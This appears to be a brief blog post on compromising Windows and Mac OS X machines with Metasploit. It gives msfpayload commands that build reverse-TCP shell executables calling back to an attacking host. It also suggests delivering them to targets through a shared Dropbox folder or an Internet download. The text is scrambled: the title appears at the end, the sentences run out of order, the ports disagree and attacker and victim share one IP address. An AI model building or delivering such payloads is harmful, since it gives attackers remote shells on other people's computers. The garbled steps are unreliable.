To start the Metasploit console from Kali we run: msfconsole Once the exploit is on the device, we can use Metasploit to compromise it. Next we would save this to a shared folder (such as on Dropbox) and then install it on the instances, otherwise it could be downloaded over the Internet. Msfpayload windows/shell_reverse_tcp LHOST=192.168.0.24 LPORT=4445 R > wind.exe So if the attacking host is at 192.168.0.24, and we callback on port 4444, then we create the exploit with: msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.0.24 LPORT=4444 R > osxv The vulnerability will create a call-back from the Windows/Mac OS X instances to Metasploit. In this case the attacking host is at 192.168.0.24, and the Mac OS X instance is at 192.168.0.24. The attacker uses a reverse TCP connection to make a call-back to the attacking host. This article shows how a Windows and Mac OS X instance can be compromised using Metasploit. Remote Shell in Windows/Mac OS X with Metasploit
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |